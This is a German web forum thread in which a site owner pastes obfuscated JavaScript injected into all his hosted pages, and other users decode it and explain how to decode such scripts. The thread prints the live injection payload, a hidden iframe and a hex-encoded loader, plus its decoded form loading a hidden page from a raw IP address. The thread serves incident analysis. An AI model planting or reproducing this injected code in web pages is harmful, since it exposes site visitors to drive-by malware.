Was macht dieses Java Script (Virus?)

M

mbulli

Fröhlicher User
ID: 222682
L
24 Februar 2007
215
17
Hallo,
auf meinen Seiten bei einem Hoster ist auf allen Dateien, nach ?> vom PHP code, diese Javascript, was macht dieser Code:

PHP: 
<iframe src='https://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475caca8c304b(v475caca8c3842){ function v475caca8c403b () {var v475caca8c4833=16; return v475caca8c4833;} return(parseInt(v475caca8c3842,v475caca8c403b()));}function v475caca8c5042(v475caca8c5857){ function v475caca8c685a () {return 2;} var v475caca8c6049='';for(v475caca8c6444=0; v475caca8c6444<v475caca8c5857.length; v475caca8c6444+=v475caca8c685a()){ v475caca8c6049+=(String.fromCharCode(v475caca8c304b(v475caca8c5857.substr(v475caca8c6444, v475caca8c685a()))));}return v475caca8c6049;} document.write(v475caca8c5042('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37366163633138636339207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313330343234292B2761363764643166306163625C272077696474683D343736206865696768743D323734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

<iframe src='https://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475caca8c304b(v475caca8c3842){ function v475caca8c403b () {var v475caca8c4833=16; return v475caca8c4833;} return(parseInt(v475caca8c3842,v475caca8c403b()));}function v475caca8c5042(v475caca8c5857){ function v475caca8c685a () {return 2;} var v475caca8c6049='';for(v475caca8c6444=0; v475caca8c6444<v475caca8c5857.length; v475caca8c6444+=v475caca8c685a()){ v475caca8c6049+=(String.fromCharCode(v475caca8c304b(v475caca8c5857.substr(v475caca8c6444, v475caca8c685a()))));}return v475caca8c6049;} document.write(v475caca8c5042('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37366163633138636339207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313330343234292B2761363764643166306163625C272077696474683D343736206865696768743D323734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Zum Vergrößern anklicken....

Jedesmal, wenn man die Seite betritt, kommt eine Meldung vom Virenprogramm und die Seite läde sehr lange.

Ich wäre sehr dankbar, wenn mir jemand sagt, was dieser Code macht.
 
Das Skript dekodiert den darinsteckenden Code, welcher wiederum das hier macht:
Code: 
<SCRIPT>window.status='Done';document.write('<iframe name=76acc18cc9 src=\'https://77.221.133.188/.if/go.html?'+Math.round(Math.random()*130424)+'a67dd1f0acb\' width=476 height=274 style=\'display: none\'></iframe>')</SCRIPT>
Was da dann wiederum in dem Iframe passiert, weiss ich ned.
 
OK tleilax danke für die Arbeit, also nun weiß ich, das sich da irgend jemand auf meine HP gehackt hat und ein Iframe reinplatziert hat, wahrscheins zu einem Virus.
 
tleilax schrieb:
Das Skript dekodiert den darinsteckenden Code, welcher wiederum das hier macht:
Code: 
<SCRIPT>window.status='Done';document.write('<iframe name=76acc18cc9 src=\'https://77.221.133.188/.if/go.html?'+Math.round(Math.random()*130424)+'a67dd1f0acb\' width=476 height=274 style=\'display: none\'></iframe>')</SCRIPT>
Was da dann wiederum in dem Iframe passiert, weiss ich ned.
Zum Vergrößern anklicken....

Hello , i wondering how you decoded this malicious encrytpted code?

in german: Hallo, ich frage mich, wie Sie diese decodiert schädliche encrytpted Code?

Vielen Dank im Voraus
 
demode schrieb:
in german: Hallo, ich frage mich, wie Sie diese decodiert schädliche encrytpted Code?
Zum Vergrößern anklicken....
JavaScript ist komplett clientseitig. D.h. alles was der Browser empfängt, muss er auch entschlüsseln können, ob es auszuführen. Und da es sich auf Clientseite abspielt, hast auch du, als Mensch der den Browser benutzt, den Zugriff auf die Daten.

Am einfachsten ersetzt du eval() bzw. document.write() mit alert() und das JavaScript nutzt seinen eigenen Entschlüsselungsalgorithmus und zeigt dir das Ergebnis an, anstatt es auszuführen.
 
Any software for decrypt javascripts codes, or do you have any suggestion for me?

in deutchs: Jede software für Javascripts Codes entschlüsseln, oder haben Sie einen Vorschlag für mich?
 
Well, my approach to extracting the "crypted" code was the following:

First of all, the last part of the Javascript looks just like any Hex-"encoded" string, so I extract just that part from the script, removed the blanks and wrote a little PHP-Script that took each pair of alphanumeric digits of the string and then turned it into it's original content.

The Script looked something like the following:
PHP: 
<?php
  $text = 'DEADFACE';
  for ($i=0, $length=strlen($text); $i<$length; $i+=2)
  {
    echo chr(hexdec(substr($text, $i, 2)));
  }
?>
 
Sorry my deutsch not well so i can't understand you.i using google translate while write you deutsch.

deutsch: Sorry mein deutsch nicht gut, so kann ich nicht verstehen, you.i mit Google zu übersetzen, während Sie schreiben deutsch.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

S
Beex Script
Antworten
1
Aufrufe
1K
Smssam
Smssam
Zurück
Oben